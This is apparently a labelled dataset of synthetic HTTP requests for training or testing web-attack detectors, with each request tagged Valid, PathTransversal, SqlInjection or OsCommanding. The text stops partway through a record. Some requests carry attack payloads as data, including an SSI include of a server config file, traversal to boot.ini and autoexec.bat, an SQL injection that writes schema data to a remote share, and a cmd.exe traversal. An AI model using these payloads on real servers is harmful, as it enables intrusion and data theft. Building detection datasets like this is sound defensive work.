GET /fgpfQr2hforA70dz/tqvimkQ6MdwWUuPYc/ewir/eTeydo5l/lrif/obNYsAqpZWJ/nWhThdWu.5K/umecs/cmVri8pJe/ivLIkn8bJhZnE/d7lJK.js?asnhnau=%3C%21--+++++%23include++++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22++--%3E&ap=8rq0a7l%26r&ehgjeijneibn=2170711&tsiesolhc=41815&pitl5enc=cebeqej97&mti0=tvws5s+uiCn%28ayo HTTP/1.0
Host: www.Svcid.net:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ios91hn-dya;q=0.3, oeinrje-neta;q=0.0
Cache-Control: min-fresh=4
Client-ip: 39.207.20.202
Cookie: j59gAit4ento=4;msoudT=dooeAwy7nc5dsett
Cookie2: $Version="3"
Date: Wed, 21 May 08 15:45:01 UTC
ETag: W/"A2.v71CkZHD7@G96Mx"
Expect: 100-continue
From: ae07on@oist3.org
If-Modified-Since: Tue, 06 May 08 07:20:35 GMT
If-Unmodified-Since: Fri, 20 May 05 08:22:40 UTC
If-Match: "5649_BVinmGcR92K"
If-None-Match: "IW37ej9JezZMgRmh"
If-Range: Wed, 17 Sep 08 12:56:30 CET
Max-Forwards: 2149
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Basic MklyaW46dHI1dDV6b3A=
Authorization: s1CGtm oInfrS=tsiskn
Range: -3
Referer: /JBatdil/xtemrl/r9torp8e.swf
TE: trailers,gzip;q=0.0
Trailer: Authorization
User-Agent: Mozilla/3.1 (compatible; MSIE 4.5; Open BSD i386; erAt; tres8djt; oTeNtnmsa)
UA-CPU: PowerPC
UA-Disp: 749,540,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2034x6396
Via: 9.8 www.nxdsog.jpeg:792, 8.1 179.52.196.3, 6.8 21.9.135.254:153
Transfer-Encoding: compress
Upgrade: o7s/5.6, dipl/2.7
Warning: 233 www.tttteg.htm "ttmdenotsrmsagg2nt4" "Mon, 21 May 07 21:20:21 CET"
X-Forwarded-For: 209.99.255.194
X-Serial-Number: 659531112
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39642
Start - Id: 28262
class: Valid
GET /Ksrc/hsSrea9op/sO/t456KZ-M3/cmntvaonsroD6/c7UHftsx.eEKFQfQK/ielsbuutp/eleer2t6b/sr/rZtop_uD/tmKHnd/k-UwqUrfcw7.jsp?_r.uwMMW=eDM&doryTnvtvwnn=9&8ytd=tsrt3mjoeo&oa=miodsrh&ss=322&1Hcailttawd=rdya&snee8gvwa=8574336&XiwhueoAh=d%3Atp%27&wp-IFgYpi@pavbscriptQ=erwp4biorptle9r&ea=tGxZW HTTP/1.1
Host: 151.50.15.187
Connection: close
Accept: */*
Accept-Charset: iso-8859-3
Accept-Encoding: 
Accept-Language: es-nH;q=0.3, hcheayqu-2oo, orla-nehy;q=0.0, a-meewssbI
Cache-Control: max-age=2906
Client-ip: 213.90.3.226
Cookie: hra17mhnr=39;_DhF=stg
Cookie2: $Version="5"
Date: Thu, 04 Jun 09 07:56:05 GMT
ETag: W/"XFzzI4W4rJFOBKEx"
Expect: ibTp1t=svzsd
From: sse6d@agdeoarrhr.com
If-Modified-Since: Fri, 20 Jul 07 04:21:32 GMT
If-Unmodified-Since: Sun, 07 Oct 07 18:09:34 CET
If-Match: "A2AxuI4IlELTgdzdWy6"
If-None-Match: "gUIghAt2yiMnLUIfE"
If-Range: Sun, 19 Dec 04 15:08:28 UTC
Max-Forwards: 142
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Digest username="4yGrs"
Authorization: drln rrnreo=dswmetnS
Range: 29956-,-15205
Referer: /nneie/abs3.mp3
TE: trailers,deflate
Trailer: From
User-Agent: Mozilla/8.5 (compatible; 20jAk; Mac OS X; tenioalora; djtr)
UA-CPU: Sparc
UA-Disp: 5435,696,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 0895x834
Via: 5.2 www.gnrup.gif, 2.4 www.oB8suldr.gif, 1.1 www.wBl1.htm
Transfer-Encoding: identity
Upgrade: toeSy/0.2, eveg9e/9.5
Warning: 334 0.64.248.123:76205 "otiprr" "Wed, 15 Aug 07 02:30:33 UTC"
X-Forwarded-For: 209.67.183.110
X-Serial-Number: 59455788287965152
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28262
Start - Id: 45486
class: PathTransversal
GET /lnikchsadOnh2o6p.msf?Yeexecs1Q46YN0.=o%3A%5Cautoexec.bat&vNweYo=163976&Eu15yvoe4ono=aaf8&aii1tR=6&on2serteQ6nEthI=yeZC0z9v71O HTTP/1.1
Host: 36.5.195.131:72092
Connection: close
Accept: text/html;q=0.1, image/*;q=0.6
Accept-Charset: cp-936;q=0.6, iso-2022-jp;q=0.6, cp-936, x-mac-ce
Accept-Encoding: 
Accept-Language: nrnet-tiamr6e;q=0.9
Cache-Control: min-fresh=1
Client-ip: 132.219.111.18
Cookie: eater=ezJJAPNzt7;havingrsVu_=421777660
Cookie2: $Version="39"
Date: Mon, 28 Jul 08 13:43:44 UTC
ETag: "SQQiLGzppLASCU-m"
Expect: 100-continue
From: rddIbt@n7reian.st
If-Modified-Since: Sat, 01 Sep 07 04:58:09 CET
If-Unmodified-Since: Mon, 17 Aug 09 19:57:10 CET
If-Match: "P81d2kSqq7XukJFVE"
If-None-Match: *
If-Range: "KZt_3YzgCYNe3WW1QD"
Max-Forwards: 237
MIME-Version: 3.1
Pragma: e=r3otnee
Proxy-Authorization: Digest username="hesa"
Authorization: NTLM YmhzbW5vbm40bW9vcmJ0ZXRwc3V0YnJ1b2l5cDN4cmljbGNleQ==
Range: 7-
Referer: http://www.Fgoiewao.de/cbnlyOh/ze0ml/r0MeRie/ar0w.asp
TE: trailers
Trailer: Expect
User-Agent: saToeus/2.9.9.0
UA-CPU: PowerPC
UA-Disp: 3626,740,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 5163x468
Via: 5.1 www.truEqua.gif, 1.2 www.oHurtr.shtml, FTP/9.4 www.oLlaoa.jpeg
Transfer-Encoding: compress
Upgrade: drf/1.3, eoe/9.9
Warning: 365 125.192.186.93 "ituito" "Thu, 24 Feb 05 23:03:46 UTC"
X-Forwarded-For: 224.80.9.55
X-Serial-Number: 49844
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45486
Start - Id: 41116
class: SqlInjection
GET /tAktijgiI/aeopbomFkc7a/fsoasltkattneaoml48n/kZoW377FdtGtO2W.Swu/wnMnboScofd6f/80odtatyo/tiidcserj6nlt8/aTmdFHYFu_22iCPdk-/odzWY3s/acaeruN/pBpw2yie4H.exe?tElodethuz=fsupdate%7C%5CNt%5Bie%7E%40&U6ECL5Igt=eshutdown%5C%3F&rmelz=%27%3B+++++EXEC++++master..sp_makewebtask+++%22%5C%5C101.33.39.95%5Cmaooe%5Csgeoo.css%22%2C++%22SELECT++++*+FROM++++INFORMATION_SCHEMA.TABLES%22&SCHJ3Bp5biniAc=aiS&lnnabp5e8=e&6e=c%3D-g%3F HTTP/1.0
Host: www.jt6tda.uk
Connection: close
Accept: */*;q=0.9
Accept-Charset: windows-1254;q=0.1, x-mac-hebrew, iso-8859-1;q=0.1, euc-jp
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 252.114.224.184
Cookie: r0=l;s7allttgm=sCWWJ;umgdmsneyoacmh=348
Cookie2: $Version="75"
Date: Mon, 10 Apr 06 07:24:11 UTC
ETag: "o2wljYaHrxuGgPOQDnb6"
Expect: a3snhd
From: ljbnc@t4tt.net
If-Modified-Since: Fri, 25 Apr 08 07:44:16 CET
If-Unmodified-Since: Mon, 16 Jul 07 04:26:33 CET
If-Match: *
If-None-Match: *
If-Range: "Ggq11yjwKPT7am@PB"
Max-Forwards: 50
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Digest opaque="sqsll"
Authorization: Basic ZWdpaGFkczp6cmVlenVDbA==
Range: -397
Referer: /boandju/uhT72ieD/asiid1lw/Elooias/ehuh6.conf
TE: gzip
Trailer: Authorization
User-Agent: Mozilla/1.1 (Machintosh; U; PPC Mac OS X 4.1; Dm-il; rv:5.6.3) Gecko/47728104
UA-CPU: Sparc
UA-Disp: 071,802,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 194x0684
Via: FTP/6.7 www.nChhkume.jpg, 5.8 www.tdA5iaga.tiff
Transfer-Encoding: compress
Upgrade: mdt/1.4, asjofr/9.3, 9meo/3.8
Warning: 323 www.l1Er.tiff "djhflegmslO" "Thu, 15 Apr 04 02:45:31 UTC"
X-Forwarded-For: 247.25.143.27
X-Serial-Number: 54708069609443708
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 41116
Start - Id: 2581
class: Valid
GET /oS1HZSLmaA5khM85E/A86insertP_pbBtZnN3/ep5dAPDEiZhk/YEt6ev8x3insertKDC/nMQ3tT..Hct@vpSfZ/wpLibkthtgi1toanthcR/99g3z_P.8OFtC05/8F4frqNtoJishA.html?lTa4rltd=rd+escript&4bhd=%3EodSejscs7epaoss&dcpi0stee=eseOenen0wAxte9aii&szaeo2aL=9627208 HTTP/1.1
Host: www.tspsarlo.it
Connection: close
Accept: video/quicktime;q=0.8, image/jpeg;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: lsOi-ns, Ne-nihmT
Cache-Control: only-if-cached
Client-ip: 55.106.123.246
Cookie: llplyE=60;hlib.dyvn=xp_;esn3j=a7lgpfoH2e'r;eI6paNneNm=gw
Cookie2: $Version="64"
Date: Sun, 22 Feb 04 21:27:08 GMT
ETag: W/"VIXU5KySQEy1khxcK0P"
Expect: 100-continue
From: nenonte@ily8ueedor.uk
If-Modified-Since: Tue, 06 May 08 05:53:30 UTC
If-Unmodified-Since: Thu, 25 Feb 10 04:00:17 GMT
If-Match: "vE2Dajb6bFto6.z2Pkp"
If-None-Match: "LAli3yt@zMO_@FmvJWGp"
If-Range: Sat, 19 Jun 04 14:56:21 UTC
Max-Forwards: 49
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: NTLM d3Nlc245ZW11cWFIaHRlY2x3ZnRNd0tlZ2RkbmFvN3hzbnI=
Authorization: qsiu cptrzbka=gdqrh4
Range: 9-6,46-1
Referer: /ee6ef/ts7ki.tar.gz
TE: trailers
Trailer: Cache-Control
User-Agent: Ytomemo
UA-CPU: x86
UA-Disp: 0486,5217,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6067x8441
Via: 6.7 172.141.66.6, FTP/3.1 www.nmH2fw.html, FTP/3.3 www.akmM2asf.css
Transfer-Encoding: compress
Upgrade: hutie/7.1
Warning: 163 www.f0at.jpg "SonooWieiso" 
X-Forwarded-For: 254.65.44.244
X-Serial-Number: 77079667
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 2581
Start - Id: 45508
class: PathTransversal
GET /n@fF.Ic/xZsD/ls.7ZETSnWGXie/fREka.cgi?uEgp=9300579&6bin.N=2&dnsrottjewh=evalin&ZPL-A4=77770&ij2aEmypoob=n%3A%5Cwindows%5Cboot.ini&neeieas=0bund&ik=bn8unike&2VfblCiaC=hicez+o2c9thconnectvbscriptLT3o HTTP/1.0
Host: www.diHCs7um.st
Connection: onee
Accept: */*;q=0.4
Accept-Charset: euc-tw, iso-2022-jp;q=0.2, x-mac-hebrew;q=0.3, iso-8859-15, cp-932;q=0.3
Accept-Encoding: 
Accept-Language: cErzatl-h;q=0.1, peeham-inrfn;q=0.5, 3Kisie-olmTu;q=0.3
Cache-Control: no-cache
Client-ip: 136.132.185.114
Cookie: 9nBr7y=ap tc;txte6otynfcfac=accept 0;ArW6Ekqeehraef=kutwwriijt2hP
Cookie2: $Version="087"
Date: Thu, 15 May 08 16:47:27 GMT
ETag: W/"8s6NLnMvF3qQwwHgq_w"
Expect: 100-continue
From: tetsj@adnocr.uk
If-Modified-Since: Sun, 15 May 05 10:06:11 GMT
If-Unmodified-Since: Fri, 12 Mar 10 03:24:37 GMT
If-Match: "snS-qjYQJR-3WRd"
If-None-Match: *
If-Range: "RBYAI-hmkeorUD4"
Max-Forwards: 47
MIME-Version: 9.0
Pragma: 876e=jccio
Proxy-Authorization: Basic Q240c1A6bHNqZGRuZ3g=
Authorization: NTLM UG1uZGE1c2tlcVRlbXNSbmhPaWVtb2lFc21lbWVpb2FLdGFkdHR0YW9w
Range: 354-,63882-
Referer: /sdeitssl/xiim/is3sts8t/asfOod/lrnyholu.nsf
TE: deflate
Trailer: Referer
User-Agent: Mozilla/2.9 (X11; U; Open BSD i586 2.2; al-p1; rv:7.8.7) Gecko/49612345
UA-CPU: Sparc
UA-Disp: 970,9844,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2096x915
Via: 7.8 6.182.109.221
Transfer-Encoding: identity
Upgrade: paa/8.6, yprO/1.1
Warning: 336 www.pkli.gif "eE8hyyveresaci5o6et" 
X-Forwarded-For: 59.230.132.58
X-Serial-Number: 8223453
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45508
Start - Id: 32112
class: Valid
GET /yZDinorln3lsa/ndzKksKGJ/s1ZuPqn5Kh.html?mwsetj=yf&scriptlvueUunQdZc=7172185&tnfi3e=63384&rmab=1459404&kteisal=dtoiNvhservicessAsttlc&lhe=164&NcnyrjDshutdowntelneth=5&8baUlr=qe%25hy&h9Mqfconnectwinnt=3458747&oidtjEow2hvqnA=nestiushpljbhotogm&ooid=a%26n&OdOogIaNTpoe=eFHP50Nf6&ml=tnwyRNnh HTTP/1.0
Host: www.jaflreete.st
Connection: ea3doa
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: compress;q=0.5, deflate, compress, gzip;q=0.9, compress;q=0.0
Accept-Language: 7hse-ve;q=0.5
Cache-Control: no-cache
Client-ip: 234.77.42.198
Cookie: e6Ah83nteshhn=6209145;njvrtbzegeusRt=nkU
Cookie2: $Version="98"
Date: Wed, 26 May 04 11:07:21 GMT
ETag: "D_Ls_R7aeBy36JCM7s"
Expect: znnrtj=5seob7w;erlhsae=uifl
From: ijahAc@tatq.st
If-Modified-Since: Thu, 17 Jun 04 10:43:59 GMT
If-Unmodified-Since: Wed, 14 Apr 10 06:55:33 GMT
If-Match: *
If-None-Match: "sBHLXzQH2ooOeWQz"
If-Range: Sat, 12 Jun 04 06:47:13 CET
Max-Forwards: 793
MIME-Version: 8.6
Pragma: enaem=iet2
Proxy-Authorization: Basic ZXNvbHRybzphRk9p
Authorization: Digest response="E2b01dB6AD38AFB3ccd5fDBEDDfCD4dD"
Range: 095730-
Referer: /lIgn.shtml
TE: deflate
Trailer: Accept-Language
User-Agent: Mozilla/6.5 (compatible; Konqueror/7.1; Mac OS X; QhOllt; hitndrt)
UA-CPU: 68000
UA-Disp: 3488,5746,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 367x7496
Via: FTP/0.8 123.36.166.1, FTP/6.5 161.203.4.102, 7.0 114.170.74.69:66134
Transfer-Encoding: compress
Upgrade: css1e/8.1, hcr/4.7, edPyb/6.6, 1a1s/2.3, uakT/1.3
Warning: 593 210.153.84.107 "domopgoe" 
X-Forwarded-For: 212.42.200.181
X-Serial-Number: 3953508
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32112
Start - Id: 44094
class: OsCommanding
GET ..%c1%8s...%c1%8s..%c1%8s..%c1%8s..%c1%8s../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.eutotgenn.st
Connection: fconwlee
Accept: */*;q=0.5
Accept-Charset: x-mac-chinesesimp, cp-950
Accept-Encoding: *
Accept-Language: Beke-r9o, ndeengz3-e4v
Cache-Control: max-stale=1814
Client-ip: 237.235.110.125
Cookie: A5ysosho=xEne6heof4fddsh3;etbh0=h5YCF5uS;teevgnemiotd=gkH4_q-PX;4Ewgetttelnetf=20075560;iathvbia=eaquahReUN
Cookie2: $Version="94"
Date: Fri, 08 Jun 07 03:19:50 UTC
ETag: "ZS9GbP3St8Y_vcI."
Expect: 100-continue
From: ixam@eaec.uk
If-Modified-Since: Sun, 06 Apr 08 16:52:11 GMT
If-Unmodified-Since: Wed, 11 May 05 20:59:28 CET
If-Match: *
If-None-Match: "V3Ha_YMdBSMA-AvjJ"
If-Range: Tue, 27 Mar 07 15:16:41 GMT
Max-Forwards: 5022
MIME-Version: 0.4
Pragma: tpee3pwh=etrzuti
Proxy-Authorization: NTLM YTlha3RlZjlua29weWVzb2s3MW5yemFoMm5wbk4waVJzZW9ndG4zTGhpOGh0aQ==
Authorization: Basic YmlvdHRicG46R2hvY2N5dA==
Range: 70-
Referer: http://sraeeo.cz/tizF.png
TE: chunked
Trailer: If-Match
User-Agent: Mozilla/3.9 (compatible; Konqueror/6.9; Win 9x; zrnp; hSr5ze; wetsida)
UA-CPU: x86
UA-Disp: 6409,6413,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 1501x189
Via: HTTP/3.0 135.149.112.57
Transfer-Encoding: hOUe
Upgrade: unHis2/9.7, sDw/8.7
Warning: 552 www.5qeog.tiff "0tt4tuzwrsgn" 
X-Forwarded-For: 91.48.222.8
X-Serial-Number: 388289600968011
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44094
Start - Id: 12632
class: Valid
GET /gs0eseaeke0qsuwz8L/plo/nwfbj-j.Hd/2wrQp36Im9bb/ZDT3jd9qLK84.js?eouin=S+nmt%25&tHwtsoeie=8u+oftmpsq&staaejLe=htacces%2F%3Aal3nien&VDiLv=94367267&hwCegnNgr=663444&lH4on0tB1=thefe&tDT.8=6952814343&KMSW=kqyOgg&Dteaem=2445 HTTP/1.0
Host: www.yOo8kta.org
Connection: keep-alive
Accept: video/*;q=0.7, text/plain;q=0.6, text/plain
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: Ensms='ide'
Client-ip: 36.193.95.65
Cookie: rdlo=rse>AheJje3;rlbtpuo=89567575;bruf=afUOY89m@Ew
Cookie2: $Version="5"
Date: Sat, 03 Apr 04 08:45:14 UTC
ETag: W/"GKGrunWgwqzVq8o"
Expect: 8mtlG=ls0c8I
From: e9hfirse@Sgst2t.uk
If-Modified-Since: Mon, 01 Mar 10 22:02:33 CET
If-Unmodified-Since: Sun, 22 Aug 04 03:18:56 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 041
MIME-Version: 6.4
Pragma: Diesk='cEde3tn'
Proxy-Authorization: NTLM czZpaW90N29vZE80aGlsd3RScElhRGZ2ZWlhM3M2Zk5kc0k4SWQ=
Authorization: os8uv t1bcP4=rzhnxt0
Range: 351-,8925-
Referer: http://eoahh.ch/utowttN/rsioh/h8weart/oac5rwh/oEmhe8.jpeg
TE: trailers,gzip;q=0.0,deflate;q=0.8
Trailer: If-Match
User-Agent: aEfn1Uctbp8npIK
UA-CPU: x86
UA-Disp: 3446,218,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 280x609
Via: 4.6 www.Eitton.gif, wlupdb/0.3 52.19.185.243
Transfer-Encoding: deflate
Upgrade: ecc/3.0, uoz/4.6, asr/7.3, iyUor/1.5, ouaiR/5.0
Warning: 783 72.102.250.16 "awreRn4fniopo" 
X-Forwarded-For: 145.181.44.34
X-Serial-Number: 18879
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12632
Start - Id: 26798
class: Valid
GET /vFMe3xML/oatitiaDteHeiame/t51QZGjavDFGU/sgmemhlvsaerold/sJ5ahNmN0K5LFua/DSiGhtaccesmTVtoptX.exe?hzpe=2905227&nt3bO1hdY=aos&evalA4mochaYHZ=pufGJcpT4jf&.UQQSYL=dFeOu&noAD.YJ=os+f&tnudqaf4nsd=13037&bo3T2p=where&bwsmer=a%40D--o&t3ntooaonmh=%7CN7oOgraYAaabEm-f%40p&eitehHnIenrr=298&6zQGkc@=52&6agcao=8764907&natieiccaix9k=7066255&xtermasRA=81211864&aut=0658590 HTTP/1.0
Host: 130.60.100.164:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: x-mac-arabic;q=0.1, x-mac-arabic, x-mac-chinesesimp;q=0.9, isiri-3342, cp-950;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-stale
Client-ip: 41.148.162.64
Cookie: PWlocation8QAyd=4kyssmthtrsbt;st1oleoah7tynew=51519878;xamj9=sDvUA-@BXQ7;b6sIAsevv=l?
Cookie2: $Version="581"
Date: Thu, 21 Oct 04 07:16:41 GMT
ETag: W/"-bmXS9aTrVk3rN0XBmoY"
Expect: Wrsat=enelIl
From: kEqlnim@ntnj.ch
If-Modified-Since: Mon, 31 Dec 07 18:47:35 GMT
If-Unmodified-Since: Fri, 08 Jan 10 19:35:43 UTC
If-Match: "upgAFa6mV-Kk4-teMuR"
If-None-Match: *
If-Range: Fri, 22 Oct 04 08:11:55 GMT
Max-Forwards: 9276
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest uri=http://dilak.net/sazsrhrt.gif
Range: 09-115498
Referer: http://7heSon.it/rnds/tktehef/OeR5/tNarpxtn.dll
TE: trailers
Trailer: Host
User-Agent: Mozilla/9.3 (X11; U; Unix 0.0; cn-ds; rv:0.4.8) Gecko/26714690
UA-CPU: StrongARM
UA-Disp: 8290,106,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3935x4964
Via: 5.0 222.60.67.255, HTTP/2.8 32.210.68.24, 7.5 www.j6O7p.shtml:4531
Transfer-Encoding: titeur
Upgrade: coar/9.8
Warning: 269 www.i6Whrlab.tiff:1 "5pHj" 
X-Forwarded-For: 63.148.52.222
X-Serial-Number: 51104
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26798
Start - Id: 25212
class: Valid
GET /xmlK99bRs3/sMGXTs.hpAIQ6vGH/c_p2ZAm/XW.asp? HTTP/1.0
Host: 230.168.108.38:80
Connection: mA2i
Accept: */*;q=0.1
Accept-Charset: us-ascii, windows-1252
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 41.95.155.11
Cookie: FDHg=mpej=%;msad5=s1s;naohcsrGg3Elts=orssfgai3ta5t
Cookie2: $Version="8"
Date: Fri, 30 Sep 05 09:21:04 UTC
ETag: W/"6J4xlJq52K1FedG9K9Mw"
Expect: aChA=eiAisn
From: xtrtser5@serpd.st
If-Modified-Since: Fri, 05 Dec 08 18:23:48 GMT
If-Unmodified-Since: Mon, 22 Oct 07 09:43:20 GMT
If-Match: "n0N5s0EXBpXFkWO"
If-None-Match: "CO9HPtS8V8zKe37Q"
If-Range: "1DTZ9DmPKO.eMyc"
Max-Forwards: 944
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest algorithm=racm
Range: 850-,74-97198,3-55
Referer: http://vmLydgvi.uk/zifi/Ga4e5e.png
TE: deflate,trailers,trailers
Trailer: Accept
User-Agent: Mozilla/0.9 (X11; U; Linux i586 7.5; et-tt; rv:5.1.4) Gecko/15445702
UA-CPU: x86
UA-Disp: 334,5908,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 3634x3185
Via: FTP/3.9 www.uorle.jpg
Transfer-Encoding: gzip
Upgrade: 5a9ie/7.6, rmde/0.7, uem/2.7
Warning: 490 www.n7rtrte.htm "6nrmt" 
X-Forwarded-For: 243.124.209.190
X-Serial-Number: 39906730696975900354
----: --------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 25212
Start - Id: 14380
class: Valid
GET /mL3IhnqN/aOn/qSGf/IcatT/s38H/e25Dy0CbDdI2/hi2trOsleb/snre3wssgyYD0/g40vsw.js?fm=rPPcnf&WechoRNd90dloB=NiYceiarluaThe&jhynl=iaVNo&Sap=klozqceddecf&CbetweenEXw@tV=3407&oaezrOeaernqia=aNnU-lr7Z_Ek&Rteutl8r0q=f.Y&ha2t=34&irtw=vnHeAtirtVii HTTP/1.1
Host: 151.119.70.86
Connection: it757
Accept: image/*;q=0.9
Accept-Charset: windows-1258;q=0.3, iso-8859-6, iso-8859-4;q=0.9
Accept-Encoding: *
Accept-Language: nnhtlp-hcarijh, o-eeteit
Cache-Control: min-fresh=29
Client-ip: 166.239.11.152
Cookie: crepotsot=4oeO5nvnosa3?ivsm;itdak=r;jnpces4sheIoa=foiahk5vdue;to2unrtYnrs=kltcshutdown;usnaReir=9067089255;plmiuersleduT=zsgacluh
Cookie2: $Version="56"
Date: Sat, 10 Sep 05 16:34:09 GMT
ETag: W/"GjGgvGraJvEvMOTxn"
Expect: 100-continue
From: Esys@smxt.fr
If-Modified-Since: Wed, 19 Aug 09 19:05:33 CET
If-Unmodified-Since: Mon, 13 Aug 07 04:44:22 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 176
MIME-Version: 9.6
Pragma: d='oyefoeb'
Proxy-Authorization: are8Hq iWu7=vneaiwu
Authorization: Digest qop=auth
Range: 6035-,928-
Referer: /hg95njlo/ci7ufhp/lfni.shtml
TE: gzip;q=0.7
Trailer: Accept
User-Agent: Mozilla/3.1 (X11; U; Linux i586 7.7; mT-xn; rv:6.9.6) Gecko/01886550
UA-CPU: StrongARM
UA-Disp: 3544,5975,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 8463x313
Via: diwe/6.7 225.6.28.207
Transfer-Encoding: lcsl; eolZgtlj=ad7Hii
Upgrade: egtiin/0.3
Warning: 596 232.43.0.142 "o7nreoNhqvei" 
X-Forwarded-For: 200.253.91.80
X-Serial-Number: 24080640322850948511
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 14380
Start - Id: 23462
class: Valid
GET /jHconnectP4-execTDaSBgQ/aai/9N3vEeg/nhneredHaoTN/jbQlZejdWMx/75JX_ICo/synlha8ro2ateos2thk/ecgo7naetmsrrtsvO8/l42md/eaaHeu/ITrEMsLXusrNY.d.exe?oo8oe6synf=ieH&icIbYfs8eareef=htacceskmocha7eistdinq&Sh6isza2usf=tlo4sngaece&he5Ososhrdeu=hKgFtL0&_JkBlYJW=e9hs&6Nh6mHB=sat&fyta=anxafoqnochumfsbt8&0ttshdmna=nrordodceTe1go&nsn=31usrUB49ea+2ro HTTP/1.0
Host: www.7oifa88otc.net:80
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: fl-wyrl7soi;q=0.5, hdM-ln, r8-uOAm3soh;q=0.9, s-ko;q=0.4
Cache-Control: mt='1lr3'
Client-ip: 153.160.70.239
Cookie: hdItGo=leutnonsM5egStslo;cei2=8QoAEAttent
Cookie2: $Version="551"
Date: Sun, 12 Dec 04 02:43:29 UTC
ETag: W/"-fuUBF2aEQBbYVph"
Expect: hpvhc6=idelr;raox
From: tocfie@tta6.cz
If-Modified-Since: Sun, 06 Jul 08 15:27:06 CET
If-Unmodified-Since: Fri, 15 Jul 05 09:52:40 GMT
If-Match: "57X_LXIeGqWWT9cHLzed"
If-None-Match: *
If-Range: Sat, 10 Jan 09 18:23:23 GMT
Max-Forwards: 2489
MIME-Version: 3.9
Pragma: snesi=a
Proxy-Authorization: NTLM aWVpYW9zbXQ2emUwdXNyckxjZm5lZGZmSXFlbnJoc3RpMmVucmk=
Authorization: oaPt 8nu2blse=zhortc
Range: 19-29961,-41
Referer: http://rhcErice.be/7dsi/meibSe/wsil/snhbi9/r48ttyN.ace
TE: trailers
Trailer: From
User-Agent: Mozilla/3.3 (Machintosh; U; PPC Mac OS X 9.6; 5e-xn; rv:7.6.3) Gecko/85567657
UA-CPU: StrongARM
UA-Disp: 2035,3360,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 543x2792
Via: 9.3 155.249.85.151, FTP/9.1 254.38.223.155, 8.6 96.58.57.26
Transfer-Encoding: deflate
Upgrade: roe/8.9, root/1.9
Warning: 683 www.fFdgenep.jpeg "pNdodrhDroeousrSreo" "Mon, 16 May 05 21:27:45 GMT"
X-Forwarded-For: 146.71.117.9
X-Serial-Number: 5183522523
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23462
Start - Id: 3179
class: Valid
GET /e4ts84F252KKatW.aspx?retsDaL=tC HTTP/1.1
Host: www.feWts.gov:80
Connection: rnqOa
Accept: */*;q=0.6
Accept-Charset: macintosh
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: max-age=20
Client-ip: 113.248.135.113
Cookie: 8.7LcKQwU_8=8942972;eesr=7615;droppBO4window.openp=iIgEi:R84y;brohdtRs11gSth=2lh3;iottaeabetdon1=75045;dEtw1hotnssn=ntlS
Cookie2: $Version="9"
Date: Thu, 22 May 08 03:10:51 GMT
ETag: "wpYO@bsApGndQi5@"
Expect: 100-continue
From: esjrw@sdiElnyr.fr
If-Modified-Since: Sun, 01 Nov 09 15:46:51 CET
If-Unmodified-Since: Sun, 10 Jun 07 20:21:20 CET
If-Match: *
If-None-Match: "wJbZdiHliZZ-7MeSh1"
If-Range: "cKiiKnGT8mQ991RuyoBO"
Max-Forwards: 3
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: Basic OHRyZTpUZWttd3N0ZQ==
Authorization: didli ib8ottzn=5rasglk6
